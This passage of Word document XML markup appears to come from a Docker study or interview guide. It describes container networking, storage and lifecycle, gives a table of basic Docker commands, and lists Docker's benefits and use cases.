    <w:p w14:paraId="40AFA4E3" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="00127EBD" w:rsidRDefault="00BF7CA0" w:rsidP="00127EBD">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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The application (e.g., nginx) runs inside the container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D557A79"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Networking and Storage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43483DE9" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="00127EBD" w:rsidRDefault="00BF7CA0" w:rsidP="00127EBD">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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Docker sets up virtual networking and attaches volumes or bind mounts if specified.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457BF833"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Monitoring and Lifecycle Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FED8D3A" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="00127EBD" w:rsidRDefault="00BF7CA0" w:rsidP="00127EBD">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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Docker tracks the container lifecycle (start, stop, pause, restart) and logs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174FB59A" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="00127EBD" w:rsidRDefault="00BF7CA0" w:rsidP="00127EBD">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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Resources (CPU, memory) can be limited per container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F68C04" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="00127EBD" w:rsidRDefault="00000000" w:rsidP="00127E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A58DC93">
          <v:rect id="_x0000_i3387" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="786662B2"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Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>📤</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bonus: Container Lifecycle Command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25"/>
        <w:gridCol w:w="3909"/>
      </w:tblGrid>
      <w:tr w:rsidR="00127EBD" w:rsidRPr="00127EBD" w14:paraId="53286474" w14:textId="77777777" w:rsidTr="00BF7CA0">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0AE5406D"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Theme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Command</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="17E54F85"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Theme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00127EBD" w:rsidRPr="00127EBD" w14:paraId="10D3F5F2" w14:textId="77777777" w:rsidTr="00BF7CA0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4FA28663"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docker build</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="290A7269"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Build a Docker image from a Dockerfile</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00127EBD" w:rsidRPr="00127EBD" w14:paraId="5D10205A" w14:textId="77777777" w:rsidTr="00BF7CA0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2E8F098D"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docker run</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="406E2862"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Create and start a container</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00127EBD" w:rsidRPr="00127EBD" w14:paraId="71933328" w14:textId="77777777" w:rsidTr="00BF7CA0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4EB5F3FC"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docker ps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="355DFBD7"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List running containers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00127EBD" w:rsidRPr="00127EBD" w14:paraId="196CAAC3" w14:textId="77777777" w:rsidTr="00BF7CA0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="371E6D62"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docker exec</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="25571927"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Run a command inside a running container</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00127EBD" w:rsidRPr="00127EBD" w14:paraId="140A9233" w14:textId="77777777" w:rsidTr="00BF7CA0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="78DFBA27"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docker stop / docker rm</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="39F556AA"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Stop and remove containers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="78C10E8E" w14:textId="31245652" w:rsidR="00145166" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0014516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FB440BD">
          <v:rect id="_x0000_i3388" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFF26BA" w14:textId="4B848AD6" w:rsidR="00613601" w:rsidRPr="00CE4B95" w:rsidRDefault="004E48D8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="840" w:name="_Toc196308320"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How is Docker helpful</w:t>
      </w:r>
      <w:r w:rsidR="00613601" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="840"/>
    </w:p>
    <w:p w14:paraId="3AB6B4B2" w14:textId="47D27C3F" w:rsidR="00BF7CA0" w:rsidRPr="00127EBD" w:rsidRDefault="00BF7CA0" w:rsidP="00127EBD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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 xml:space="preserve">Docker is </w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hugely helpful</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in modern software development and DevOps for many reasons. Here's how Docker adds value:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3EE57C" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="00127EBD" w:rsidRDefault="00000000" w:rsidP="00127E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542C1E0">
          <v:rect id="_x0000_i3389" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF69134"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Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1. Consistent Environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172D327D"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Docker containers package all dependencies (OS, libraries, etc.) with the app.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF69A89"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"It works on my machine"</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> problems disappear.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E934B4A"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Same container runs identically on dev, test, staging, and production.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73BC47B2" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="00127EBD" w:rsidRDefault="00000000" w:rsidP="00127E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D14587C">
          <v:rect id="_x0000_i3390" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="19177492"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Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🚀</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2. Fast &amp; Lightweight</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DFD716"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 xml:space="preserve">Containers are </w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>lightweight</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (unlike VMs) — they share the host OS kernel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4B3CDD"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 xml:space="preserve">Startup is in </w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>seconds</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, not minutes like VMs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6AA3E8"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Less resource usage = more efficient CI/CD pipelines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281EC8E9" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="00127EBD" w:rsidRDefault="00000000" w:rsidP="00127E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0936A08">
          <v:rect id="_x0000_i3391" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="400E4D04"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Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🔁</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3. Easy CI/CD Integration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FAD5908"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Integrates with Jenkins, GitHub Actions, GitLab CI, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383D8C28"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Docker images can be built and deployed automatically in pipelines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C36A4F0" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="00127EBD" w:rsidRDefault="00000000" w:rsidP="00127E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2579EB5">
          <v:rect id="_x0000_i3392" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="47624CD3"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Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🧩</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4. Microservices Ready</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212A18FD"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Each microservice runs in its own container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670D6FAF"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Easy to manage, scale, and deploy services independently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09827B3F" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="00127EBD" w:rsidRDefault="00000000" w:rsidP="00127E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6704B83">
          <v:rect id="_x0000_i3393" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBEDE39"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Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🧪</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 5. Simplifies Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6035B4"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Run test environments in containers quickly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF9241D"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Spin up disposable containers for integration or end-to-end tests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FEB51AF" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="00127EBD" w:rsidRDefault="00000000" w:rsidP="00127E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0DBE8E">
          <v:rect id="_x0000_i3394" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A9AF06"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Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🗂️</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 6. Version Control for Environments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AC23D0"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Dockerfiles serve as </w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>infrastructure code</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E6C9F8"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Teams can version and audit the environment setup.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDEE126" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="00127EBD" w:rsidRDefault="00000000" w:rsidP="00127E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53F885">
          <v:rect id="_x0000_i3395" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="00702F2C"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Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🔒</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 7. Isolation &amp; Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACE5F95"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Containers run in isolated user spaces.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A35C49B"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Avoids conflicts between applications/services on the same host.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC4157F" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="00127EBD" w:rsidRDefault="00000000" w:rsidP="00127E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771E33B">
          <v:rect id="_x0000_i3396" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7982E7"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Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>☁️</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 8. Portability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9FA2A0"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Run anywhere: laptop, VM, cloud (AWS, Azure, GCP), or Kubernetes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332E8B46"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Build once, run anywhere" concept.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA1CA48" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="00127EBD" w:rsidRDefault="00000000" w:rsidP="00127EB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7270AE6">
          <v:rect id="_x0000_i3397" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D9FB6F" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="00127EBD" w:rsidRDefault="00BF7CA0" w:rsidP="00127EBD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🛠️</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use Cases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8F8B8B"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Local development</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E93282"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Environment replication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4364FE"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Microservice deployment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33862DDB"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Continuous delivery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D99EC45"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Load testing and sandboxing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5509F85E" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="00127EBD" w:rsidRDefault="00BF7CA0" w:rsidP="00127EBD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Legacy app modernization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7809725F" w14:textId="488B9721" w:rsidR="00145166" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0014516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8999F93">
          <v:rect id="_x0000_i3398" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E2C03F" w14:textId="5CEC4D64" w:rsidR="00613601" w:rsidRPr="00CE4B95" w:rsidRDefault="00875D42">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="841" w:name="_Toc196308321"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the use of Docker</w:t>
      </w:r>
      <w:r w:rsidR="00613601" w:rsidRPr="00CE4B95">
        <w:rPr>
